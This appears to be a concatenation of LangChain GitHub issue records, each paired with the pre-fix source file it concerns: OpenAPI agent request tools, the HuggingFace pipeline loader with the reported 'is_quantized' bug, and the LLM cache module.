response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPostToolWithParsing(BaseRequestsTool, BaseTool):
"""Requests POST tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_post"
"""Tool name."""
description = REQUESTS_POST_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_POST_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.post(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPatchToolWithParsing(BaseRequestsTool, BaseTool):
"""Requests PATCH tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_patch"
"""Tool name."""
description = REQUESTS_PATCH_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PATCH_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.patch(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsPutToolWithParsing(BaseRequestsTool, BaseTool):
"""Requests PUT tool with LLM-instructed extraction of truncated responses."""
name: str = "requests_put"
"""Tool name."""
description = REQUESTS_PUT_TOOL_DESCRIPTION
"""Tool description."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""Maximum length of the response to be returned."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_PUT_PROMPT)
)
"""LLMChain used to extract the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.put(data["url"], data["data"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
class RequestsDeleteToolWithParsing(BaseRequestsTool, BaseTool):
"""A tool that sends a DELETE request and parses the response."""
name: str = "requests_delete"
"""The name of the tool."""
description = REQUESTS_DELETE_TOOL_DESCRIPTION
"""The description of the tool."""
response_length: Optional[int] = MAX_RESPONSE_LENGTH
"""The maximum length of the response."""
llm_chain: LLMChain = Field(
default_factory=_get_default_llm_chain_factory(PARSING_DELETE_PROMPT)
)
"""The LLM chain used to parse the response."""
def _run(self, text: str) -> str:
try:
data = json.loads(text)
except json.JSONDecodeError as e:
raise e
response = self.requests_wrapper.delete(data["url"])
response = response[: self.response_length]
return self.llm_chain.predict(
response=response, instructions=data["output_instructions"]
).strip()
async def _arun(self, text: str) -> str:
raise NotImplementedError()
#
# Orchestrator, planner, controller.
#
def _create_api_planner_tool(
api_spec: ReducedOpenAPISpec, llm: BaseLanguageModel
) -> Tool:
endpoint_descriptions = [
f"{name} {description}" for name, description, _ in api_spec.endpoints
]
prompt = PromptTemplate(
template=API_PLANNER_PROMPT,
input_variables=["query"],
partial_variables={"endpoints": "- " + "- ".join(endpoint_descriptions)},
)
chain = LLMChain(llm=llm, prompt=prompt)
tool = Tool(
name=API_PLANNER_TOOL_NAME,
description=API_PLANNER_TOOL_DESCRIPTION,
func=chain.run,
)
return tool
def _create_api_controller_agent(
api_url: str,
api_docs: str,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> AgentExecutor:
get_llm_chain = LLMChain(llm=llm, prompt=PARSING_GET_PROMPT)
post_llm_chain = LLMChain(llm=llm, prompt=PARSING_POST_PROMPT)
tools: List[BaseTool] = [
RequestsGetToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=get_llm_chain
),
RequestsPostToolWithParsing(
requests_wrapper=requests_wrapper, llm_chain=post_llm_chain
),
]
prompt = PromptTemplate(
template=API_CONTROLLER_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"api_url": api_url,
"api_docs": api_docs,
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt),
allowed_tools=[tool.name for tool in tools],
)
return AgentExecutor.from_agent_and_tools(agent=agent, tools=tools, verbose=True)
def _create_api_controller_tool(
api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
) -> Tool:
"""Expose controller as a tool.
The tool is invoked with a plan from the planner, and dynamically
creates a controller agent with relevant documentation only to
constrain the context.
"""
base_url = api_spec.servers[0]["url"] # TODO: do better.
def _create_and_run_api_controller_agent(plan_str: str) -> str:
pattern = r"\b(GET|POST|PATCH|DELETE)\s+(/\S+)*"
matches = re.findall(pattern, plan_str)
endpoint_names = [
"{method} {route}".format(method=method, route=route.split("?")[0])
for method, route in matches
]
endpoint_docs_by_name = {name: docs for name, _, docs in api_spec.endpoints}
docs_str = ""
for endpoint_name in endpoint_names:
docs = endpoint_docs_by_name.get(endpoint_name)
if not docs:
raise ValueError(f"{endpoint_name} endpoint does not exist.")
docs_str += f"== Docs for {endpoint_name} == \n{yaml.dump(docs)}\n"
agent = _create_api_controller_agent(base_url, docs_str, requests_wrapper, llm)
return agent.run(plan_str)
return Tool(
name=API_CONTROLLER_TOOL_NAME,
func=_create_and_run_api_controller_agent,
description=API_CONTROLLER_TOOL_DESCRIPTION,
)
def create_openapi_agent(
api_spec: ReducedOpenAPISpec,
requests_wrapper: RequestsWrapper,
llm: BaseLanguageModel,
shared_memory: Optional[ReadOnlySharedMemory] = None,
callback_manager: Optional[BaseCallbackManager] = None,
verbose: bool = True,
agent_executor_kwargs: Optional[Dict[str, Any]] = None,
**kwargs: Dict[str, Any],
) -> AgentExecutor:
"""Instantiate OpenAI API planner and controller for a given spec.
Inject credentials via requests_wrapper.
We use a top-level "orchestrator" agent to invoke the planner and controller,
rather than a top-level planner
that invokes a controller with its plan. This is to keep the planner simple.
"""
tools = [
_create_api_planner_tool(api_spec, llm),
_create_api_controller_tool(api_spec, requests_wrapper, llm),
]
prompt = PromptTemplate(
template=API_ORCHESTRATOR_PROMPT,
input_variables=["input", "agent_scratchpad"],
partial_variables={
"tool_names": ", ".join([tool.name for tool in tools]),
"tool_descriptions": "\n".join(
[f"{tool.name}: {tool.description}" for tool in tools]
),
},
)
agent = ZeroShotAgent(
llm_chain=LLMChain(llm=llm, prompt=prompt, memory=shared_memory),
allowed_tools=[tool.name for tool in tools],
**kwargs,
)
return AgentExecutor.from_agent_and_tools(
agent=agent,
tools=tools,
callback_manager=callback_manager,
verbose=verbose,
**(agent_executor_kwargs or {}),
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,809 | AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized' | ### System Info
LangChain: langchain-0.0.314
Python: Anaconda Python 3.9.18
X86
RTX3080 Laptop (16G)
CUDA 11.8
cuDNN 8.9.5
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
1.git clone https://github.com/ymcui/Chinese-LLaMA-Alpaca-2.git
2.cd Chinese-LLaMA-Alpaca-2/scripts/langchain
3.python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
(langchain) zhanghui@zhanghui-OMEN-by-HP-Laptop-17-ck0xxx:~/Chinese-LLaMA-Alpaca-2/scripts/langchain$ python langchain_sum.py --model_path chinese-alpaca-2-7b-hf --file_path doc.txt --chain_type refine
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/__init__.py:39: UserWarning: Importing HuggingFacePipeline from langchain root module is no longer supported.
warnings.warn(
loading LLM...
Loading checkpoint shards: 100%|███████████████████████████████████████████████████████████████████████████████| 2/2 [00:03<00:00, 1.86s/it]
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:362: UserWarning: `do_sample` is set to `False`. However, `temperature` is set to `0.9` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `temperature`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/transformers/generation/configuration_utils.py:367: UserWarning: `do_sample` is set to `False`. However, `top_p` is set to `0.6` -- this flag is only used in sample-based generation modes. You should set `do_sample=True` or unset `top_p`. This was detected when initializing the generation config instance, which means the corresponding file may hold incorrect parameterization and should be fixed.
warnings.warn(
Traceback (most recent call last):
File "/home/zhanghui/Chinese-LLaMA-Alpaca-2/scripts/langchain/langchain_sum.py", line 50, in <module>
model = HuggingFacePipeline.from_model_id(model_id=model_path,
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/langchain/llms/huggingface_pipeline.py", line 112, in from_model_id
model.is_quantized
File "/home/zhanghui/anaconda3/envs/langchain/lib/python3.9/site-packages/torch/nn/modules/module.py", line 1614, in __getattr__
raise AttributeError("'{}' object has no attribute '{}'".format(
AttributeError: 'LlamaForCausalLM' object has no attribute 'is_quantized'
### Expected behavior
![image](https://github.com/langchain-ai/langchain/assets/63148804/b7dc429d-e19b-45fc-ba70-b977b72af9b8)
| https://github.com/langchain-ai/langchain/issues/11809 | https://github.com/langchain-ai/langchain/pull/11891 | efa9ef75c098e23f00f95be73c39ae66fdb1c082 | 5019f59724b2b6adf840b78019f2581546cb390d | "2023-10-14T13:46:33Z" | python | "2023-10-16T23:54:20Z" | libs/langchain/langchain/llms/huggingface_pipeline.py | from __future__ import annotations
import importlib.util
import logging
from typing import Any, List, Mapping, Optional
from langchain.callbacks.manager import CallbackManagerForLLMRun
from langchain.llms.base import BaseLLM
from langchain.llms.utils import enforce_stop_tokens
from langchain.pydantic_v1 import Extra
from langchain.schema import Generation, LLMResult
DEFAULT_MODEL_ID = "gpt2"
DEFAULT_TASK = "text-generation"
VALID_TASKS = ("text2text-generation", "text-generation", "summarization")
DEFAULT_BATCH_SIZE = 4
logger = logging.getLogger(__name__)
class HuggingFacePipeline(BaseLLM):
"""HuggingFace Pipeline API.
To use, you should have the ``transformers`` python package installed.
Only supports `text-generation`, `text2text-generation` and `summarization` for now.
Example using from_model_id:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
hf = HuggingFacePipeline.from_model_id(
model_id="gpt2",
task="text-generation",
pipeline_kwargs={"max_new_tokens": 10},
)
Example passing pipeline in directly:
.. code-block:: python
from langchain.llms import HuggingFacePipeline
from transformers import AutoModelForCausalLM, AutoTokenizer, pipeline
model_id = "gpt2"
tokenizer = AutoTokenizer.from_pretrained(model_id)
model = AutoModelForCausalLM.from_pretrained(model_id)
pipe = pipeline(
"text-generation", model=model, tokenizer=tokenizer, max_new_tokens=10
)
hf = HuggingFacePipeline(pipeline=pipe)
"""
pipeline: Any #: :meta private:
model_id: str = DEFAULT_MODEL_ID
"""Model name to use."""
model_kwargs: Optional[dict] = None
"""Keyword arguments passed to the model."""
pipeline_kwargs: Optional[dict] = None
"""Keyword arguments passed to the pipeline."""
batch_size: int = DEFAULT_BATCH_SIZE
"""Batch size to use when passing multiple documents to generate."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@classmethod
def from_model_id(
cls,
model_id: str,
task: str,
device: Optional[int] = -1,
model_kwargs: Optional[dict] = None,
pipeline_kwargs: Optional[dict] = None,
batch_size: int = DEFAULT_BATCH_SIZE,
**kwargs: Any,
) -> HuggingFacePipeline:
"""Construct the pipeline object from model_id and task."""
try:
from transformers import (
AutoModelForCausalLM,
AutoModelForSeq2SeqLM,
AutoTokenizer,
)
from transformers import pipeline as hf_pipeline
except ImportError:
raise ValueError(
"Could not import transformers python package. "
"Please install it with `pip install transformers`."
)
_model_kwargs = model_kwargs or {}
tokenizer = AutoTokenizer.from_pretrained(model_id, **_model_kwargs)
try:
if task == "text-generation":
model = AutoModelForCausalLM.from_pretrained(model_id, **_model_kwargs)
elif task in ("text2text-generation", "summarization"):
model = AutoModelForSeq2SeqLM.from_pretrained(model_id, **_model_kwargs)
else:
raise ValueError(
f"Got invalid task {task}, "
f"currently only {VALID_TASKS} are supported"
)
except ImportError as e:
raise ValueError(
f"Could not load the {task} model due to missing dependencies."
) from e
if (
model.is_quantized
or model.model.is_loaded_in_4bit
or model.model.is_loaded_in_8bit
) and device is not None:
logger.warning(
f"Setting the `device` argument to None from {device} to avoid "
"the error caused by attempting to move the model that was already "
"loaded on the GPU using the Accelerate module to the same or "
"another device."
)
device = None
if device is not None and importlib.util.find_spec("torch") is not None:
import torch
cuda_device_count = torch.cuda.device_count()
if device < -1 or (device >= cuda_device_count):
raise ValueError(
f"Got device=={device}, "
f"device is required to be within [-1, {cuda_device_count})"
)
if device < 0 and cuda_device_count > 0:
logger.warning(
"Device has %d GPUs available. "
"Provide device={deviceId} to `from_model_id` to use available"
"GPUs for execution. deviceId is -1 (default) for CPU and "
"can be a positive integer associated with CUDA device id.",
cuda_device_count,
)
if "trust_remote_code" in _model_kwargs:
_model_kwargs = {
k: v for k, v in _model_kwargs.items() if k != "trust_remote_code"
}
_pipeline_kwargs = pipeline_kwargs or {}
pipeline = hf_pipeline(
task=task,
model=model,
tokenizer=tokenizer,
device=device,
batch_size=batch_size,
model_kwargs=_model_kwargs,
**_pipeline_kwargs,
)
if pipeline.task not in VALID_TASKS:
raise ValueError(
f"Got invalid task {pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
return cls(
pipeline=pipeline,
model_id=model_id,
model_kwargs=_model_kwargs,
pipeline_kwargs=_pipeline_kwargs,
batch_size=batch_size,
**kwargs,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {
"model_id": self.model_id,
"model_kwargs": self.model_kwargs,
"pipeline_kwargs": self.pipeline_kwargs,
}
@property
def _llm_type(self) -> str:
return "huggingface_pipeline"
def _generate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
# List to hold all results
text_generations: List[str] = []
for i in range(0, len(prompts), self.batch_size):
batch_prompts = prompts[i : i + self.batch_size]
# Process batch of prompts
responses = self.pipeline(batch_prompts)
# Process each response in the batch
for j, response in enumerate(responses):
if isinstance(response, list):
# if model returns multiple generations, pick the top one
response = response[0]
if self.pipeline.task == "text-generation":
try:
from transformers.pipelines.text_generation import ReturnType
remove_prompt = (
self.pipeline._postprocess_params.get("return_type")
!= ReturnType.NEW_TEXT
)
except Exception as e:
logger.warning(
f"Unable to extract pipeline return_type. "
f"Received error:\n\n{e}"
)
remove_prompt = True
if remove_prompt:
text = response["generated_text"][len(batch_prompts[j]) :]
else:
text = response["generated_text"]
elif self.pipeline.task == "text2text-generation":
text = response["generated_text"]
elif self.pipeline.task == "summarization":
text = response["summary_text"]
else:
raise ValueError(
f"Got invalid task {self.pipeline.task}, "
f"currently only {VALID_TASKS} are supported"
)
if stop:
# Enforce stop tokens
text = enforce_stop_tokens(text, stop)
# Append the processed text to results
text_generations.append(text)
return LLMResult(
generations=[[Generation(text=text)] for text in text_generations]
)
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 11,197 | Documents not being correctly indexed in vector database. ["redis.exceptions.ResponseError: my_docs: no such index"] | ### System Info
Following the steps of indexing from [ https://python.langchain.com/docs/modules/data_connection/indexing ](url) you'll find the following error "redis.exceptions.ResponseError: my_docs: no such index".
You'll get this exception while using redis as retriever:
![Screenshot from 2023-09-28 16-57-03](https://github.com/langchain-ai/langchain/assets/81446007/afae536e-7888-4183-93d0-bfa65a8845a2)
### Who can help?
_No response_
### Information
- [x] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
![Screenshot from 2023-09-28 16-13-18](https://github.com/langchain-ai/langchain/assets/81446007/281206ed-b7c6-4b18-a3cc-25874fec7a06)
The error is here:
![Screenshot from 2023-09-28 16-32-00](https://github.com/langchain-ai/langchain/assets/81446007/f6bf52fb-d0ef-4f38-b247-475522bdfece)
If you look for the index you'll get (empty list or set).
This line makes impossible to save in the wanted format, and there's another thing: The index is not created for some reason.
I'll try to fix, but I'm not sure if it's possible for me at the moment, so I'm reporting this, I hope it helps.
### Expected behavior
Expected behavior inside Redis: "docs:indexname_:12ss2sadd" | https://github.com/langchain-ai/langchain/issues/11197 | https://github.com/langchain-ai/langchain/pull/11257 | 079d1f3b8e8cf7a4aaa60009fe4402169cd62d8a | d5c2ce7c2e1179907400f2c96fc6309a54cbce6a | "2023-09-28T19:57:36Z" | python | "2023-10-24T17:51:25Z" | libs/langchain/langchain/cache.py | """
.. warning::
Beta Feature!
**Cache** provides an optional caching layer for LLMs.
Cache is useful for two reasons:
- It can save you money by reducing the number of API calls you make to the LLM
provider if you're often requesting the same completion multiple times.
- It can speed up your application by reducing the number of API calls you make
to the LLM provider.
Cache directly competes with Memory. See documentation for Pros and Cons.
**Class hierarchy:**
.. code-block::
BaseCache --> <name>Cache # Examples: InMemoryCache, RedisCache, GPTCache
"""
from __future__ import annotations
import hashlib
import inspect
import json
import logging
import uuid
import warnings
from datetime import timedelta
from functools import lru_cache
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
List,
Optional,
Tuple,
Type,
Union,
cast,
)
from sqlalchemy import Column, Integer, Row, String, create_engine, select
from sqlalchemy.engine.base import Engine
from sqlalchemy.orm import Session
try:
from sqlalchemy.orm import declarative_base
except ImportError:
from sqlalchemy.ext.declarative import declarative_base
from langchain.llms.base import LLM, get_prompts
from langchain.load.dump import dumps
from langchain.load.load import loads
from langchain.schema import ChatGeneration, Generation
from langchain.schema.cache import RETURN_VAL_TYPE, BaseCache
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_env
from langchain.vectorstores.redis import Redis as RedisVectorstore
logger = logging.getLogger(__file__)
if TYPE_CHECKING:
import momento
from cassandra.cluster import Session as CassandraSession
def _hash(_input: str) -> str:
"""Use a deterministic hashing approach."""
return hashlib.md5(_input.encode()).hexdigest()
def _dump_generations_to_json(generations: RETURN_VAL_TYPE) -> str:
"""Dump generations to json.
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: Json representing a list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
return json.dumps([generation.dict() for generation in generations])
def _load_generations_from_json(generations_json: str) -> RETURN_VAL_TYPE:
"""Load generations from json.
Args:
generations_json (str): A string of json representing a list of generations.
Raises:
ValueError: Could not decode json string to list of generations.
Returns:
RETURN_VAL_TYPE: A list of generations.
Warning: would not work well with arbitrary subclasses of `Generation`
"""
try:
results = json.loads(generations_json)
return [Generation(**generation_dict) for generation_dict in results]
except json.JSONDecodeError:
raise ValueError(
f"Could not decode json to list of generations: {generations_json}"
)
def _dumps_generations(generations: RETURN_VAL_TYPE) -> str:
"""
Serialization for generic RETURN_VAL_TYPE, i.e. sequence of `Generation`
Args:
generations (RETURN_VAL_TYPE): A list of language model generations.
Returns:
str: a single string representing a list of generations.
This function (+ its counterpart `_loads_generations`) rely on
the dumps/loads pair with Reviver, so are able to deal
with all subclasses of Generation.
Each item in the list can be `dumps`ed to a string,
then we make the whole list of strings into a json-dumped.
"""
return json.dumps([dumps(_item) for _item in generations])
def _loads_generations(generations_str: str) -> Union[RETURN_VAL_TYPE, None]:
"""
Deserialization of a string into a generic RETURN_VAL_TYPE
(i.e. a sequence of `Generation`).
See `_dumps_generations`, the inverse of this function.
Args:
generations_str (str): A string representing a list of generations.
Compatible with the legacy cache-blob format
Does not raise exceptions for malformed entries, just logs a warning
and returns none: the caller should be prepared for such a cache miss.
Returns:
RETURN_VAL_TYPE: A list of generations.
"""
try:
generations = [loads(_item_str) for _item_str in json.loads(generations_str)]
return generations
except (json.JSONDecodeError, TypeError):
# deferring the (soft) handling to after the legacy-format attempt
pass
try:
gen_dicts = json.loads(generations_str)
# not relying on `_load_generations_from_json` (which could disappear):
generations = [Generation(**generation_dict) for generation_dict in gen_dicts]
logger.warning(
f"Legacy 'Generation' cached blob encountered: '{generations_str}'"
)
return generations
except (json.JSONDecodeError, TypeError):
logger.warning(
f"Malformed/unparsable cached blob encountered: '{generations_str}'"
)
return None
class InMemoryCache(BaseCache):
"""Cache that stores things in memory."""
def __init__(self) -> None:
"""Initialize with empty cache."""
self._cache: Dict[Tuple[str, str], RETURN_VAL_TYPE] = {}
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
return self._cache.get((prompt, llm_string), None)
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
self._cache[(prompt, llm_string)] = return_val
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
self._cache = {}
Base = declarative_base()
class FullLLMCache(Base): # type: ignore
"""SQLite table for full LLM Cache (all generations)."""
__tablename__ = "full_llm_cache"
prompt = Column(String, primary_key=True)
llm = Column(String, primary_key=True)
idx = Column(Integer, primary_key=True)
response = Column(String)
class SQLAlchemyCache(BaseCache):
"""Cache that uses SQAlchemy as a backend."""
def __init__(self, engine: Engine, cache_schema: Type[FullLLMCache] = FullLLMCache):
"""Initialize by creating all tables."""
self.engine = engine
self.cache_schema = cache_schema
self.cache_schema.metadata.create_all(self.engine)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
stmt = (
select(self.cache_schema.response)
.where(self.cache_schema.prompt == prompt) # type: ignore
.where(self.cache_schema.llm == llm_string)
.order_by(self.cache_schema.idx)
)
with Session(self.engine) as session:
rows = session.execute(stmt).fetchall()
if rows:
try:
return [loads(row[0]) for row in rows]
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
# In a previous life we stored the raw text directly
# in the table, so assume it's in that format.
return [Generation(text=row[0]) for row in rows]
return None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update based on prompt and llm_string."""
items = [
self.cache_schema(prompt=prompt, llm=llm_string, response=dumps(gen), idx=i)
for i, gen in enumerate(return_val)
]
with Session(self.engine) as session, session.begin():
for item in items:
session.merge(item)
def clear(self, **kwargs: Any) -> None:
"""Clear cache."""
with Session(self.engine) as session:
session.query(self.cache_schema).delete()
session.commit()
class SQLiteCache(SQLAlchemyCache):
"""Cache that uses SQLite as a backend."""
def __init__(self, database_path: str = ".langchain.db"):
"""Initialize by creating the engine and all tables."""
engine = create_engine(f"sqlite:///{database_path}")
super().__init__(engine)
class UpstashRedisCache(BaseCache):
"""Cache that uses Upstash Redis as a backend."""
def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of UpstashRedisCache.
This method initializes an object with Upstash Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of an Upstash Redis
client class, allowing the object to interact with Upstash Redis
server for caching purposes.
Parameters:
redis_: An instance of Upstash Redis client class
(e.g., Redis) used for caching.
This allows the object to communicate with
Redis server for caching operations on.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from upstash_redis import Redis
except ImportError:
raise ValueError(
"Could not import upstash_redis python package. "
"Please install it with `pip install upstash_redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Upstash Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str:
"""Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
# Read from a HASH
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"UpstashRedisCache supports caching of normal LLM generations, "
f"got {type(gen)}"
)
if isinstance(gen, ChatGeneration):
warnings.warn(
"NOTE: Generation has not been cached. UpstashRedisCache does not"
" support caching ChatModel outputs."
)
return
# Write to a HASH
key = self._key(prompt, llm_string)
mapping = {
str(idx): generation.text for idx, generation in enumerate(return_val)
}
self.redis.hset(key=key, values=mapping)
if self.ttl is not None:
self.redis.expire(key, self.ttl)
def clear(self, **kwargs: Any) -> None:
"""
Clear cache. If `asynchronous` is True, flush asynchronously.
This flushes the *whole* db.
"""
asynchronous = kwargs.get("asynchronous", False)
if asynchronous:
asynchronous = "ASYNC"
else:
asynchronous = "SYNC"
self.redis.flushdb(flush_type=asynchronous)
class RedisCache(BaseCache):
"""Cache that uses Redis as a backend."""
def __init__(self, redis_: Any, *, ttl: Optional[int] = None):
"""
Initialize an instance of RedisCache.
This method initializes an object with Redis caching capabilities.
It takes a `redis_` parameter, which should be an instance of a Redis
client class, allowing the object to interact with a Redis
server for caching purposes.
Parameters:
redis_ (Any): An instance of a Redis client class
(e.g., redis.Redis) used for caching.
This allows the object to communicate with a
Redis server for caching operations.
ttl (int, optional): Time-to-live (TTL) for cached items in seconds.
If provided, it sets the time duration for how long cached
items will remain valid. If not provided, cached items will not
have an automatic expiration.
"""
try:
from redis import Redis
except ImportError:
raise ValueError(
"Could not import redis python package. "
"Please install it with `pip install redis`."
)
if not isinstance(redis_, Redis):
raise ValueError("Please pass in Redis object.")
self.redis = redis_
self.ttl = ttl
def _key(self, prompt: str, llm_string: str) -> str:
"""Compute key from prompt and llm_string"""
return _hash(prompt + llm_string)
def lookup(self, prompt: str, llm_string: str) -> Optional[RETURN_VAL_TYPE]:
"""Look up based on prompt and llm_string."""
generations = []
# Read from a Redis HASH
results = self.redis.hgetall(self._key(prompt, llm_string))
if results:
for _, text in results.items():
try:
generations.append(loads(text))
except Exception:
logger.warning(
"Retrieving a cache value that could not be deserialized "
"properly. This is likely due to the cache being in an "
"older format. Please recreate your cache to avoid this "
"error."
)
# In a previous life we stored the raw text directly
# in the table, so assume it's in that format.
generations.append(Generation(text=text))
return generations if generations else None
def update(self, prompt: str, llm_string: str, return_val: RETURN_VAL_TYPE) -> None:
"""Update cache based on prompt and llm_string."""
for gen in return_val:
if not isinstance(gen, Generation):
raise ValueError(
"RedisCache only supports caching of normal LLM generations, "
f"got {type(gen)}"
)
# Write to a Redis HASH
key = self._key(prompt, llm_string)
with self.redis.pipeline() as pipe:
pipe.hset(
key,
mapping={
str(idx): dumps(generation)
for idx, generation in enumerate(return_val)
},
)
if self.ttl is not None:
pipe.expire(key, self.ttl)
pipe.execute()
def clear(self, **kwargs: Any) -> None:
"""Clear cache. If `asynchronous` is True, flush asynchronously."""
asynchronous = kwargs.get("asynchronous", False)
self.redis.flushdb(asynchronous=asynchronous, **kwargs)
class RedisSemanticCache(BaseCache):
"""Cache that uses Redis as a vector-store backend."""
# TODO - implement a TTL policy in Redis
DEFAULT_SCHEMA = {
"content_key": "prompt",
"text": [
{"name": "prompt"},
],
"extra": [{"name": "return_val"}, {"name": "llm_string"}],
}
def __init__(
self, redis_url: str, embedding: Embeddings, score_threshold: float = 0.2
):
"""Initialize by passing in the `init` GPTCache func
Args:
redis_url (str): URL to connect to Redis.
embedding (Embedding): Embedding provider for semantic encoding and search.
score_threshold (float, 0.2):
Example:
.. code-block:: python
from langchain.globals import set_llm_cache
from langchain.cache import RedisSemanticCache
from langchain.embeddings import OpenAIEmbeddings
set_llm_cache(RedisSemanticCache(
redis_url="redis://localhost:6379",
embedding=OpenAIEmbeddings()
))
"""
self._cache_dict: Dict[str, RedisVectorstore] = {}
self.redis_url = redis_url
self.embedding = embedding
self.score_threshold = score_threshold
def _index_name(self, llm_string: str) -> str:
hashed_index = _hash(llm_string)
return f"cache:{hashed_index}"
def _get_llm_cache(self, llm_string: str) -> RedisVectorstore:
index_name = self._index_name(llm_string)
# return vectorstore client for the specific llm string
if index_name in self._cache_dict:
return self._cache_dict[index_name]
# create new vectorstore client for the specific llm string
try:
self._cache_dict[index_name] = RedisVectorstore.from_existing_index(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
schema=cast(Dict, self.DEFAULT_SCHEMA),
)
except ValueError:
redis = RedisVectorstore(
embedding=self.embedding,
index_name=index_name,
redis_url=self.redis_url,
index_schema=cast(Dict, self.DEFAULT_SCHEMA),
)
_embedding = self.embedding.embed_query(text="test")
redis._create_index(dim=len(_embedding))
self._cache_dict[index_name] = redis
return self._cache_dict[index_name]
def clear(self, **kwargs: Any) -> None:
"""Clear semantic cache for a given llm_string."""
